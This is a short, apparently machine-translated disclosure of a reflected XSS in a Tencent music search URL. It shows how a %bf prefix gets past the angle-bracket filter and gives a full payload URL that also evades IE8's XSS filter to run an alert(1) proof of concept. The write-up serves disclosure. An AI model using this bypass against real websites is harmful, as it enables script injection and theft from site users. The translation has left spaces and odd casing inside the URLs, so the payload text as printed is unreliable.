Tencent's reflective XSS-Method of bypassing

It was originally a non-XSS point, but it was bypassed in a strange way. 1. First of all is the normal situation: http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord? W = aaa <script> apparently, both <and> are filtered into & lt; & gt; 2. it looks like this is not an XSS point, but it can be like the following wonderful bypass http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord? W = aaa % bf that is to say, adding % bf before each character will not be filtered, and % bf will be lost during output. 3. Further, in order to bypass the IE8 filter. Combined with WooYun: IE8 xss filter bypass (xss filter bypass)

Http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord? W = % bf <div/id % bf % 3dx % bf> x % bf </div % bf> % bf <xml: namespace prefix % bf % 3dt % bf> % bf <import namespace % bf % 3dt implementation % bf % 3d % 23 default % 23time2% bf> % bf <t: set/attributename % bf % 3 dinnerHTML targetElement % bf % 3dx to % bf % 3d % 26lt; img % 26% 2311; src % bf % 3dx: x % 26% 2311; onerror % 26% 2311; % bf % 3 dalert % 26% 23x28; 1% 26% 23x29; % 26gt; % bf>

 

Xp + ie8

Solution:

I do not know the server-side filtering logic.